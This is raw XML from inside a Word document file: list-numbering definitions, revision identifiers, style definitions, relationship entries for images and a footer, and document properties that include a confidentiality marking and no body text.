  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7397B66D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="95FECC26">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4CEC8E52">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7C50786C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5F3C00FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="92FE8422">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="849CF072">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EC76EB4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="86CA66AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2084CDEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="793E51EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="AA50532A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04E89CD0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="719CDF2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3760DC6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A01A7034">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DCA64928">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1C2AFC9A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3BDE30DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="809A2B1C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1535772048">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="606932418">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="593897970">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1761178218">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1185827915">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1951543087">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1802843115">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="555433064">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="475220332">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="13197103">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="109983065">
    <w:abstractNumId w:val="8"/>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isplayBackgroundShape/>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56A7C40"/>
    <w:rsid w:val="00191B85"/>
    <w:rsid w:val="008F5737"/>
    <w:rsid w:val="00966105"/>
    <w:rsid w:val="009F3EB1"/>
    <w:rsid w:val="009F40E3"/>
    <w:rsid w:val="00A80955"/>
    <w:rsid w:val="00CD2BD2"/>
    <w:rsid w:val="00DF5EC4"/>
    <w:rsid w:val="012C11CF"/>
    <w:rsid w:val="0182E60E"/>
    <w:rsid w:val="019E5A71"/>
    <w:rsid w:val="0216E4E1"/>
    <w:rsid w:val="031D4B31"/>
    <w:rsid w:val="03607362"/>
    <w:rsid w:val="03688923"/>
    <w:rsid w:val="037AE55E"/>
    <w:rsid w:val="03E66DE5"/>
    <w:rsid w:val="04C8FA65"/>
    <w:rsid w:val="05C29A92"/>
    <w:rsid w:val="064E90B3"/>
    <w:rsid w:val="082D487A"/>
    <w:rsid w:val="08B96445"/>
    <w:rsid w:val="09AC3600"/>
    <w:rsid w:val="0A162EFF"/>
    <w:rsid w:val="0A353F66"/>
    <w:rsid w:val="0B964DF7"/>
    <w:rsid w:val="0CEBE55D"/>
    <w:rsid w:val="0EC0B086"/>
    <w:rsid w:val="10A231D6"/>
    <w:rsid w:val="1185B355"/>
    <w:rsid w:val="130D6044"/>
    <w:rsid w:val="147A4673"/>
    <w:rsid w:val="14D157CD"/>
    <w:rsid w:val="152BC976"/>
    <w:rsid w:val="170F422C"/>
    <w:rsid w:val="17184FF7"/>
    <w:rsid w:val="17E05476"/>
    <w:rsid w:val="18FB05BF"/>
    <w:rsid w:val="1900C17C"/>
    <w:rsid w:val="19577C90"/>
    <w:rsid w:val="1A05E266"/>
    <w:rsid w:val="1B3D4171"/>
    <w:rsid w:val="1C80E24F"/>
    <w:rsid w:val="1CD77F7D"/>
    <w:rsid w:val="1DC9298A"/>
    <w:rsid w:val="1FE60CC7"/>
    <w:rsid w:val="202B986D"/>
    <w:rsid w:val="215FA13F"/>
    <w:rsid w:val="2287283E"/>
    <w:rsid w:val="2312C206"/>
    <w:rsid w:val="238389DB"/>
    <w:rsid w:val="2397C14B"/>
    <w:rsid w:val="2428AB07"/>
    <w:rsid w:val="24E34185"/>
    <w:rsid w:val="25326D79"/>
    <w:rsid w:val="259C4D70"/>
    <w:rsid w:val="2622A524"/>
    <w:rsid w:val="2662C869"/>
    <w:rsid w:val="26672BF7"/>
    <w:rsid w:val="288B75E7"/>
    <w:rsid w:val="291D6C19"/>
    <w:rsid w:val="2972F3F1"/>
    <w:rsid w:val="29A704D6"/>
    <w:rsid w:val="2A0A4DCF"/>
    <w:rsid w:val="2A9900AE"/>
    <w:rsid w:val="2B50A4B9"/>
    <w:rsid w:val="2B657E00"/>
    <w:rsid w:val="2BAB8B8E"/>
    <w:rsid w:val="2D5907A5"/>
    <w:rsid w:val="2FA9577F"/>
    <w:rsid w:val="311C8557"/>
    <w:rsid w:val="31294272"/>
    <w:rsid w:val="3221A9D7"/>
    <w:rsid w:val="34AA2DD4"/>
    <w:rsid w:val="35352C1E"/>
    <w:rsid w:val="356A7C40"/>
    <w:rsid w:val="35E68A46"/>
    <w:rsid w:val="366036FD"/>
    <w:rsid w:val="36FC7C2E"/>
    <w:rsid w:val="371C8CD8"/>
    <w:rsid w:val="3C380EBA"/>
    <w:rsid w:val="3E59E425"/>
    <w:rsid w:val="3F27C06E"/>
    <w:rsid w:val="3F6543EA"/>
    <w:rsid w:val="4144D697"/>
    <w:rsid w:val="43C50519"/>
    <w:rsid w:val="45232DF2"/>
    <w:rsid w:val="45893F5E"/>
    <w:rsid w:val="46394303"/>
    <w:rsid w:val="485EA61B"/>
    <w:rsid w:val="48A987F2"/>
    <w:rsid w:val="48B5E6A6"/>
    <w:rsid w:val="49FA7031"/>
    <w:rsid w:val="4AE70BDD"/>
    <w:rsid w:val="4B55EC5E"/>
    <w:rsid w:val="4E015E8B"/>
    <w:rsid w:val="4ED5804C"/>
    <w:rsid w:val="5045372A"/>
    <w:rsid w:val="517B49D6"/>
    <w:rsid w:val="5259E4EF"/>
    <w:rsid w:val="52E4E7BE"/>
    <w:rsid w:val="52EB9970"/>
    <w:rsid w:val="5343166A"/>
    <w:rsid w:val="552F7E41"/>
    <w:rsid w:val="55A45C1E"/>
    <w:rsid w:val="56EED3A4"/>
    <w:rsid w:val="58AEBBC2"/>
    <w:rsid w:val="595BF9CD"/>
    <w:rsid w:val="597164F1"/>
    <w:rsid w:val="5A0E500C"/>
    <w:rsid w:val="5A45FB94"/>
    <w:rsid w:val="5AD6BEBD"/>
    <w:rsid w:val="5D5109FA"/>
    <w:rsid w:val="5D60C8DA"/>
    <w:rsid w:val="5DD80BF7"/>
    <w:rsid w:val="5F0ECD20"/>
    <w:rsid w:val="5FB5460F"/>
    <w:rsid w:val="60B2593F"/>
    <w:rsid w:val="61C90434"/>
    <w:rsid w:val="62050F60"/>
    <w:rsid w:val="62D75FDB"/>
    <w:rsid w:val="63F8BA26"/>
    <w:rsid w:val="65692644"/>
    <w:rsid w:val="672645FC"/>
    <w:rsid w:val="68220A91"/>
    <w:rsid w:val="692279C5"/>
    <w:rsid w:val="69DFF26C"/>
    <w:rsid w:val="6A1F5140"/>
    <w:rsid w:val="6B895520"/>
    <w:rsid w:val="6EA9813E"/>
    <w:rsid w:val="6F53744F"/>
    <w:rsid w:val="70814F31"/>
    <w:rsid w:val="71CC2DFC"/>
    <w:rsid w:val="72209950"/>
    <w:rsid w:val="725FF572"/>
    <w:rsid w:val="7446F5D9"/>
    <w:rsid w:val="7596431B"/>
    <w:rsid w:val="76C29E4D"/>
    <w:rsid w:val="77C38136"/>
    <w:rsid w:val="799A4918"/>
    <w:rsid w:val="7A21E480"/>
    <w:rsid w:val="7B6AEBBF"/>
    <w:rsid w:val="7D14F3D3"/>
    <w:rsid w:val="7E711AD0"/>
    <w:rsid w:val="7EE2B6FA"/>
    <w:rsid w:val="7F68EE1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699A3EC5"/>
  <w15:docId w15:val="{66C41D08-03B8-4DBA-A516-BBE2E2880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ing10" w:customStyle="1">
    <w:name w:val="heading 10"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="320" w:after="160"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="heading20" w:customStyle="1">
    <w:name w:val="heading 20"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A2B4A"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF5EC4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FooterChar" w:customStyle="1">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00DF5EC4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="485EA61B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00FB4123"/>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image" Target="media/image7.png" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId18"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image" Target="media/image6.png" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png" Id="rId16"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image" Target="media/image5.png" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://google.com" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png" Id="rId1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d9378963-1951-4715-a8fd-de017d62dd42}" enabled="1" method="Privileged" siteId="{f4308c54-0208-43d3-afad-1f8df2f678b7}" removed="0"/>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Ankur Thakur</lastModifiedBy>
  <revision>6</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-21T21:00:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-22T06:31:55.1123856Z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4df012d8,1ffe48ee,69a8381d</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ClassificationContentMarkingFooterFontProps">
    <vt:lpwstr>#000000,8,Aptos</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ClassificationContentMarkingFooterText">
    <vt:lpwstr>Classified as Confidential</vt:lpwstr>
  </property>
</Properties>
</file>